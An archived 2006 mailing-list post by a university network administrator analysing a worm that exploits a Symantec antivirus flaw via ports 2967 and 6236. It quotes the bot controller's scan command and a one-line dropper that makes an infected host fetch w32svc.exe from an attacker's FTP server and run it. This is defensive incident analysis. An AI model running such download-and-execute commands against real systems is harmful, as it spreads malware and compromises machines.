[unisog] Worm exploiting Symantec client defect?????

Mike Iglesias iglesias at uci.edu
Mon Nov 27 23:02:09 GMT 2006

Gary Flynn wrote:
> Anyone know anything more about what SANS
> is reporting on this?
> http://isc.sans.org//index.php

Once a system connects to the bot controller, it gets a message like this (all 
on one line):

#text :.asc -S -s |.asc rtvscan 100 5 0 128.x.x.x |.asc rtvscan 100 5 0 128.x.x.x

This appears to start a scan on ports 2967 and 6236.  Port 2967 is the port 
used by Symantec AV remote control; I haven't seen any traffic there once the 
scanning system finds that port open so I can only guess that it attacks it to 
try to exploit the vulnerability in Symantec AV that was announced in May. 
Port 6236 appears to be some kind of command line backdoor left behind by a 
successful exploitation of the Symantec AV bug, as the prompt that the 
scanning system gets when it connects is "C:\Program Files\Symantec AntiVirus 
 >".  If the scanning system finds port 6236 open, it sends this to it (again, 
all on one line):

echo open <attacker's ip> 2100  >  i&echo user 1 1  >  >  i &echo get 
w32svc.exe  >  >  i &echo quit  >  >  i &ftp -As:i &w32svc.exe &exit

The scanning system has port 2100 open running a ftp server, and the system 
with port 6236 open is told to go get w32svc.exe and run it.  The ftp server 
responds with "220 Reptile welcomes you.." when you connect to it.  I haven't 
been able to pull down a copy of w32svc.exe from one of these systems, so I 
don't know if the ftp server is really working or not.

The Symantec advisor for the vulnerability is available at


Mike Iglesias                          Email:       iglesias at uci.edu
University of California, Irvine       phone:       949-824-6926
Network & Academic Computing Services  FAX:         949-824-2069

More information about the unisog mailing list